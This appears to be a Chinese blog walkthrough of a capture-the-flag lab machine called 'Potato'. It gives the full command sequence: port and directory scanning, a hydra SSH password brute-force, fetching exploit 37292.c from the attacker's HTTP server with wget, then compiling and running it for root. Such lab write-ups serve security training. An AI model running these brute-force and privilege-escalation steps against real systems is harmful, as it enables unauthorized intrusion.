靶机 ip:192.168.75.135
我们还是使用 arp-scan -l 查找 ip
第一步 信息收集
我们访问一下网页
只有一个土豆没有什么有用的信息
使用 dirb 扫描一下目录
得到了三个页面我们访问一下没有什么有用的信息
我们继续扫描一下端口
发现页面开启了 80 端口 还开启了 7120 端口(ssh)
结合刚才的网页是一个土豆,可以猜测一下,它的用户名就是potato,我们使用九头蛇来进行密码爆破试一下
hydra -l potato -P F:\Apt_Tools\Tools\暴力破解\密码字典\zi.txt -s 7120 -vV 192.168.75.
135 ssh
爆破到了
用户名:potato
密码:letmein
我们去登陆一下
ssh potato@192.168.75.135 -p 7120
这时我们成功登录
先查看下内核版本:
uname -a
我们得到它得内核版本为 ubuntu 3.13.0-24-generic
我们去查一下他有什么漏洞
searchsploit ubuntu 3.13.0
我们下载第一个漏洞
searchsploit -p 37292.c
将找到的文件下载到 kali 中
cp /usr/share/exploitdb/exploits/linux/local/37292.c ./
用kali开启网站,让potato下载此漏洞
python -m http.server 80
先切到tmp目录下再下载,因为tmp目录是存放临时文件的目录
cd /tmp
wget http://192.168.75.128/37292.c
下载下来得.c 文件是不能使用的,需要使用 gcc 工具将.c 变为 exp 才可以使用
gcc 37292.c -o exp
下载并修改成功,我们现在给他修改一下权限 777
chmod 777 exp
我们运行一下 exp 得到了 root 权限
/tmp/exp
我们到 root 目录中查找 flag
cd /root
ls
cat proof.txt
得到 flag
标签:tmp,37292,potato,Potato,192.168,exp,靶机,我们 From: https://blog.csdn.net/yjh20041010/article/details/144969125